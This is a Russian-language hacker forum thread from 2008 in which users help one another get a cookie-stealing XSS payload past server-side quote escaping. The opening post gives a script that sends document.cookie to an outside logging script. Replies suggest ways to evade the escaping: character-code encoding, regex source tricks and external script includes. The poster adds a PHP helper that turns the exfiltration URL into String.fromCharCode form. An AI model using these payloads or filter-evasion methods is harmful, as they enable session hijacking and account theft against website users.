HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
Перезагрузить страницу Xss и экранирование
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss и экранирование
  #1  
Старый 15.07.2008, 14:48
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию Xss и экранирование
Кидаю в болталку, т.к. тема примитивная ИМХО
Ну в общем на серваке экранирование и жаваскрипт типа
Код:
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
превратится в
Код:
<script>img = new Image(); img.src = \"http://old.antichat.ru/cgi-bin/s.jpg?\"+document.cookie;</script>
и работать небудет, чё делать?
Те кто знают JS спокойно решают эту проблему, а я без понятия, гуглил, ничё не нащёл...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 15.07.2008, 15:11
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами: 9443906

Репутация: 3313


По умолчанию
Закодируй в чаркоды
 
Ответить с цитированием

  #3  
Старый 15.07.2008, 15:12
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию
Чёто как-то нет такой функции как я понял из ошибки жаваскрипта...
Но ход мысли я понял... Хмм... Ану щас попробую ord()+ord()+... моджет получится
Да в нём и функции ord штоле нету....

Короче пойду я втыкать это хреново шифрование, спасибо

Погуглив догнал, вот сбацал скрипт, может кому надо будет
PHP код:
<?php
$s 'http://old.antichat.ru/cgi-bin/s.jpg?';
$ord = array();
for($i=0;$i<strlen($s);$i++) {
    $ord[] = ord($s[$i]);
}
$ord implode(',',$ord);
echo "String.fromCharCode($ord)";
?>
Последний раз редактировалось Ponchik; 15.07.2008 в 15:24..
 
Ответить с цитированием

  #4  
Старый 15.07.2008, 15:25
astrologer
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
С нами: 9840758

Репутация: 808


По умолчанию
/строка/.source;
/строка/.toString().slice(1, -1);

P.S.
<script src=http://whatever></script>
Последний раз редактировалось astrologer; 15.07.2008 в 15:30..
 
Ответить с цитированием

  #5  
Старый 15.07.2008, 18:30
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


По умолчанию
инклуд юзай.
и вообще на вот почитай: _http://ha.ckers.org/xss.html
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Microsoft addresses XSS in Internet Explorer Fugitif Forum for discussion of ANTICHAT 3 08.07.2008 03:47
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...